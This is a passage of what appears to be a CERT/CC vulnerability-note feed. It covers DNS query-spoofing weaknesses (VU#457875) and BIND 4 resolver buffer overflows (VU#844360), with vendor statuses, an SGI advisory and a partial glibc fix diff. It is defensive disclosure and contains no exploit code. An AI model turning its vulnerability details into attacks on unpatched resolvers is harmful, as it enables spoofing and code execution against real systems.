\n\n\nSimilarly, the glibc resolver code on Openwall GNU/*/Linux (Owl) has been modified to use unpredictable query IDs (including in the very first version of Owl available to the public), but doesn't explicitly randomize source port numbers.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Check Point __ Not Affected\n\nNotified: October 29, 2002 Updated: November 04, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCheck Point products are Not Vulnerable (we don't employ any caching DNS code).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### GNU glibc __ Not Affected\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe GNU C library does not contain a name server; it has only a stub resolver.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Network Appliance __ Not Affected\n\nUpdated: November 19, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNetApp products are not vulnerable to this problem.\n\n### Vendor Information \n\nThe vendor has not 
provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nUpdated: May 30, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this vulnerability is available from our web site: \n<http://www.xerox.com/security>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### adns __ Not Affected\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nadns is not vulnerable. It is a stub resolver library, not a full-service resolver, and does not forward queries.\n\nIf the communication between adns and nameserver can be faked up by the attacker, there can be situations where a similar attack might be made to work. 
These kinds of problems are why the adns documentation tells you that you need to make sure that only packets really from your nameserver can arrive at adns with the nameserver's source address and port.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### BSDi Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Conectiva Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional 
comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Cray Inc. Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Data General Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Engarde Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 
Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### IBM Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### 
MandrakeSoft Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Men&Mice Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### MontaVista Software Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at 
this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Nixu Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Nortel Networks Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### OpenBSD __ Unknown\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nOpenBSD uses non-repeating pseudo-random transaction IDs in all aspects of DNS. \n\n\nI am not sure about the other parts yet. \n \nBut this is in a highly hacked BIND4.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Red Hat Inc. 
Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### SGI __ Unknown\n\nNotified: October 29, 2002 Updated: December 05, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \nSGI Security Advisory \n` \n`Title : BIND Name Server DNS Spoofing Vulnerability \nNumber : 20021203-01-A \nDate : December 5, 2002 \nReference: CERT Vulnerability Note VU#457875 \nReference: SGI BUG 874059 \n______________________________________________________________________________ \n` \n`- ----------------------- \n- --- Issue Specifics --- \n- ----------------------- \n` \n`SGI acknowledges the BIND name server vulnerability reported by Vagner \nSacramento in CERT VU# 457875 (``<http://www.kb.cert.org/vuls/id/457875>`` and \n``<http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html>``) and is \ncurrently investigating. No further information is available at this time. \n` \n`For the protection of all our customers, SGI does not disclose, discuss \nor confirm vulnerabilities until a full investigation has occurred and \nany necessary patch(es) or release streams are available for all vulnerable \nand supported Linux and IRIX operating systems. 
\n` \n`Until SGI has more definitive information to provide, customers are \nencouraged to assume all security vulnerabilities as exploitable and take \nappropriate steps according to local site security policies and requirements. \n` \n`As further information becomes available, additional advisories will be \nissued via the normal SGI security information distribution methods \nincluding the wiretap mailing list. \n` \n \n`- ------------------------ \n- --- Acknowledgments ---- \n- ------------------------ \n` \n`SGI wishes to thank Vagner Sacramento, CERT, and the users of the Internet \nCommunity at large for their assistance in this matter. \n` \n \n`- -------------- \n- --- Links ---- \n- -------------- \n` \n`SGI Security Advisories can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/advisories/>`` \n` \n`SGI Security Patches can be found at: \n``<http://www.sgi.com/support/security/>`` and \n``<ftp://patches.sgi.com/support/free/security/patches/>`` \n` \n`SGI patches for IRIX can be found at the following patch servers: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/>`` \n` \n`SGI freeware updates for IRIX can be found at: \n``<http://freeware.sgi.com/>`` \n` \n`SGI fixes for SGI open sourced code can be found on: \n``<http://oss.sgi.com/projects/>`` \n` \n`SGI patches and RPMs for Linux can be found at: \n``<http://support.sgi.com/linux/>`` or \n``<http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/>`` \n` \n`SGI patches for Windows NT or 2000 can be found at: \n``<http://support.sgi.com/nt/>`` \n` \n`IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: \n``<http://support.sgi.com/irix/>`` and ``<ftp://patches.sgi.com/support/patchset/>`` \n` \n`IRIX 6.5 Maintenance Release Streams can be found at: \n``<http://support.sgi.com/colls/patches/tools/relstream/index.html>`` \n` \n`IRIX 6.5 Software Update CDs can be obtained from: 
\n``<http://support.sgi.com/irix/swupdates/>`` \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`For security and patch management reasons, ftp.sgi.com (mirrors \npatches.sgi.com security FTP repository) lags behind and does not do a \nreal-time update. \n` \n \n`- ----------------------------------------- \n- --- SGI Security Information/Contacts --- \n- ----------------------------------------- \n` \n`If there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n` \n` ------oOo------ \n` \n`SGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n` \n`The primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL ``<ftp://patches.sgi.com/support/free/security/>`` \n` \n`The SGI Security Headquarters Web page is accessible at the URL: \n``<http://www.sgi.com/support/security/>`` \n` \n`For issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n` \n`For assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n` \n` ------oOo------ \n` \n`SGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(``<http://www.sgi.com/support/security/wiretap.html>``) or by sending email to \nSGI as outlined below. 
\n` \n`% mail wiretap-request@sgi.com \nsubscribe wiretap <YourEmailAddress such as zedwatch@sgi.com > \nend \n^d \n` \n`In the example above, <YourEmailAddress> is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate to the mail program that you are finished composing the \nmail message. \n` \n \n` ------oOo------ \n` \n`SGI provides a comprehensive customer World Wide Web site. This site is \nlocated at ``<http://www.sgi.com/support/security/>`` . \n` \n` ------oOo------ \n` \n`If there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n` \n`For reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n` \n`______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. 
 \n`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sequent Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: October 29, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### The SCO Group (SCO UnixWare) Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information 
\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Unisys Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Wirex Unknown\n\nNotified: October 29, 2002 Updated: October 29, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### References \n\n * <http://www.dimap.ufrn.br/>\n * <http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf>\n * <http://razor.bindview.com/publish/papers/tcpseq.html>\n * <http://mathworld.wolfram.com/BirthdayProblem.html>\n * <http://mathworld.wolfram.com/BirthdayAttack.html>\n * <http://www.securityfocus.com/guest/17905>\n * <http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html>\n * <http://www.rnp.br/cais_en/>\n * <http://www.cert.org/advisories/CA-1997-22.html>\n * <http://www.cert.org/advisories/CA-2001-09.html>\n * <http://www.cert.org/archive/pdf/dns.pdf>\n\n### Acknowledgements\n\nThanks to Vagner Sacramento, DIMAp-UFRN. 
This vulnerability was discovered by Vagner Sacramento during the development of his master's thesis in the DIMAp/UFRN (Department of Computer Science and Applied Mathematics / Federal University of Rio Grande do Norte) under the supervision of Prof. Thais Vasconcelos Batista and Prof. Guido Lemos de Souza Filho. CAIS/RNP (the Brazilian Research Network CSIRT) publicly reported the vulnerability after conducting several experiments in order to validate its claims.\n\nThis document was written by Allen Householder & Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**Severity Metric:** | 40.50 \n**Date Public:** | 2002-11-19 \n**Date First Published:** | 2002-11-19 \n**Date Last Updated: ** | 2004-10-18 15:01 UTC \n**Document Revision: ** | 49 \n", "modified": "2004-10-18T15:01:00", "published": "2002-11-19T00:00:00", "id": "VU:457875", "href": "https://www.kb.cert.org/vuls/id/457875", "type": "cert", "title": "Various DNS service implementations generate multiple simultaneous queries for the same resource record", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-0029", "CVE-2002-0684", "CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nThe DNS stub resolver library in ISC BIND 4.9.2 through 4.9.10 contains buffer overflows in code that handles responses for network name and address requests. Other resolver libraries derived from BIND 4 such as BSD libc, GNU glibc, and those used by System V UNIX systems may also be affected. An attacker could execute arbitrary code with the privileges of the application that made the request or cause a denial of service.\n\n### Description \n\nA DNS stub resolver library provides an interface for network applications to make requests and receive responses from the domain name system. 
The BIND 4 resolver library (`libresolv.a`) contains several buffer overflows in the functions that handle responses for network name and address requests (`getnetbyname()`, `getnetbyaddr()`). While reading the answer portion of a DNS response, the functions copy data received from the network into inadequately sized buffers. A specially crafted DNS response could overflow the buffers, possibly injecting arbitrary code onto the stack.\n\nISC BIND 4.9.2 through 4.9.10 are vulnerable. DNS stub resolver libraries that are derived from BIND 4 may be vulnerable, including BSD libc, GNU glibc, and resolvers used by System V UNIX systems. In addition, some network applications provide their own resolver functions which may use vulnerable code from BIND 4. \n \nThe buffer overflows described in this document are different from the network lookup vulnerability described in [CA-2002-19](<http://www.cert.org/advisories/CA-2002-19.html>)/[VU#542971](<http://www.kb.cert.org/vuls/id/542971>)/[CAN-2002-0684](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0684>). \n \nWhen performing a DNS lookup, applications issue calls to resolver functions, at which point most applications dynamically load the relevant portion of the resolver library. Other applications are statically linked at compile time to include resolver functions. In order to use updated resolver code, dynamically linked processes must be restarted, and statically linked binaries must be recompiled. \n \n--- \n \n### Impact \n\nAn attacker could execute arbitrary code with the privileges of the application that made the request or cause a denial of service. The attacker would need to control DNS responses, possibly by spoofing responses or gaining control of a DNS server. \n \n--- \n \n### Solution \n\n \n**Patch or Upgrade** \n \nUpgrade or apply a patch as specified by your vendor. 
Dynamically linked processes must be restarted and statically linked binaries must be recompiled in order to use the fixed resolver libraries. \n \n--- \n \n \n**Local Caching DNS Server Not Effective** \n \nA local caching DNS server will not prevent malicious responses from reaching vulnerable stub resolvers. \n \n--- \n \n### Vendor Information\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server. \n \nApple is working on a software update to address this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Security Update 2002-11-21:\n\n<<http://www.apple.com/support/security/security_updates.html>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### GNU glibc __ Affected\n\nNotified: November 12, 2002 Updated: January 16, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVersion 2.3.1 of the GNU C Library is vulnerable. Earlier versions are also vulnerable. The following patch has been installed into the CVS sources, and should appear in the next version of the GNU C Library. 
This patch is also available from the following URL:\n\n<[http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-network.c.diff?r1=1.17&r2=1.15&cvsroot=glibc](<http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-network.c.diff?r1=1.17&r2=1.15&cvsroot=glibc>)> \n \n`2002-11-18 Roland McGrath <roland@redhat.com>` \n \n` * resolv/nss_dns/dns-network.c (getanswer_r): In BYNAME case, search` \n` all aliases for one that matches the \"<dotted-quad>.IN-ADDR.ARPA\" form.` \n` Do the parsing inline instead of copying strings and calling` \n` inet_network, and properly skip all alias names not matching the form.` \n \n`2002-11-14 Paul Eggert <eggert@twinsun.com>` \n \n` * resolv/nss_dns/dns-network.c (getanswer_r): Check for buffer` \n` overflow when skipping the question part and when unpacking aliases.` \n \n`===================================================================` \n`RCS file: /cvs/glibc/libc/resolv/nss_dns/dns-network.c,v` \n`retrieving revision 1.15` \n`retrieving revision 1.17` \n`diff -u -r1.15 -r1.17` \n`--- libc/resolv/nss_dns/dns-network.c 2002/10/17 21:49:12 1.15` \n`+++ libc/resolv/nss_dns/dns-network.c 2002/11/19 06:40:16 1.17` \n`@@ -283,7 +283,15 @@` \n \n` /* Skip the question part. */` \n` while (question_count-- > 0)` \n`- cp += __dn_skipname (cp, end_of_message) + QFIXEDSZ;` \n`+ {` \n`+ int n = __dn_skipname (cp, end_of_message);` \n`+ if (n < 0 || end_of_message - (cp + n) < QFIXEDSZ)` \n`+ {` \n`+ __set_h_errno (NO_RECOVERY);` \n`+ return NSS_STATUS_UNAVAIL;` \n`+ }` \n`+ cp += n + QFIXEDSZ;` \n`+ }` \n \n` alias_pointer = result->n_aliases = &net_data->aliases[0];` \n` *alias_pointer = NULL;` \n`@@ -344,64 +352,94 @@` \n` return NSS_STATUS_UNAVAIL;` \n` }` \n` cp += n;` \n`- *alias_pointer++ = bp;` \n`- n = strlen (bp) + 1;` \n`- bp += n;` \n`- linebuflen -= n;` \n`- result->n_addrtype = class == C_IN ? 
AF_INET : AF_UNSPEC;` \n`- ++have_answer;` \n`+ if (alias_pointer + 2 < &net_data->aliases[MAX_NR_ALIASES])` \n`+ {` \n`+ *alias_pointer++ = bp;` \n`+ n = strlen (bp) + 1;` \n`+ bp += n;` \n`+ linebuflen -= n;` \n`+ result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;` \n`+ ++have_answer;` \n`+ }` \n` }` \n` }` \n \n` if (have_answer)` \n` {` \n`- char *tmp;` \n`- int len;` \n`- char *in, *cp, *rp, *wp;` \n`- int cnt, first_flag;` \n`-` \n` *alias_pointer = NULL;` \n` switch (net_i)` \n` {` \n` case BYADDR:` \n`- result->n_name = result->n_aliases[0];` \n`+ result->n_name = *result->n_aliases++;` \n` result->n_net = 0L;` \n`- break;` \n`- case BYNAME:` \n`- len = strlen (result->n_aliases[0]);` \n`- tmp = (char *) alloca (len + 1);` \n`- tmp[len] = 0;` \n`- wp = &tmp[len - 1];` \n`-` \n`- rp = in = result->n_aliases[0];` \n`- result->n_name = ans;` \n`-` \n`- first_flag = 1;` \n`- for (cnt = 0; cnt < 4; ++cnt)` \n`- {` \n`- char *startp;` \n`+ return NSS_STATUS_SUCCESS;` \n \n`- startp = rp;` \n`- while (*rp != '.')` \n`- ++rp;` \n`- if (rp - startp > 1 || *startp != '0' || !first_flag)` \n`- {` \n`- first_flag = 0;` \n`- if (cnt > 0)` \n`- *wp-- = '.';` \n`- cp = rp;` \n`- while (cp > startp)` \n`- *wp-- = *--cp;` \n`- }` \n`- in = rp + 1;` \n`- }` \n`-` \n`- result->n_net = inet_network (wp);` \n`+ case BYNAME:` \n`+ {` \n`+ char **ap = result->n_aliases++;` \n`+ while (*ap != NULL)` \n`+ {` 